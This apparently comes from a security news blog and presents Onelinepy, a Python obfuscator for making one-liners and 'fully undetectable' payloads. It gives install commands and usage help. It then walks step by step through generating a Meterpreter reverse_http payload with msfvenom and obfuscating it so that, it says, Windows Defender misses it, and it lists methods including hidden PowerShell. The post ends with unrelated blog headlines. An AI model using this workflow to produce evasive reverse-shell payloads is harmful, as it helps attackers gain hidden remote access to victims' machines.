Onelinepy : Python Obfuscator To Generate One-Liners And FUD Payloads

Onelinepy is a Python Obfuscator To Generate One-Liners And FUD Payloads.

Download & Run

git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy

Usage Guide

_ | || _ _
| . | | –| | | | –| . | | | Python
|||||||||| | | Obfustucator |_| ||
usage: oneline.py [-h] [-m M] [-i I] [–script SCRIPT] [–code CODE] [–list] [–output OUTPUT]
optional arguments:
-h, –help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
–script SCRIPT File path of Python file to Obfustucate.
–code CODE Python code to Obfustucate.
–list List Obfustucating Methods.
–output OUTPUT Output File.

Example: Creating FUD Meterpreter Python Payload
  • Generate Python Payload:

msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

  • Obfustucate Payload

onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt

  • Profit! The Obfustucated Payload works against Windows Defender.

More Examples

onelinepy -m /one_line/base64 –script payload.py -i 3

onelinepy -m /one_line/hex –code “print(‘HEX!’)”

Obfustucation Method List

_ | || _ _
| . | | –| | | | –| . | | | Python
|||||||||| | | Obfustucator |_| ||
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden

R K

Recent Posts

How UDP Works and Why It Is So Fast

When people ask how UDP works, the simplest answer is this: UDP sends data quickly…

1 week ago

How EDR Killers Bypass Security Tools

Endpoint Detection and Response (EDR) solutions have become a cornerstone of modern cybersecurity, designed to…

2 weeks ago

AI-Generated Malware Campaign Scales Threats Through Vibe Coding Techniques

A large-scale malware campaign leveraging AI-assisted development techniques has been uncovered, revealing how attackers are…

2 weeks ago

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

2 weeks ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

2 weeks ago

This Android Bug Can Crack Your Lock Screen in 60 Seconds

A newly disclosed Android vulnerability is making noise for a good reason. Researchers showed that…

2 weeks ago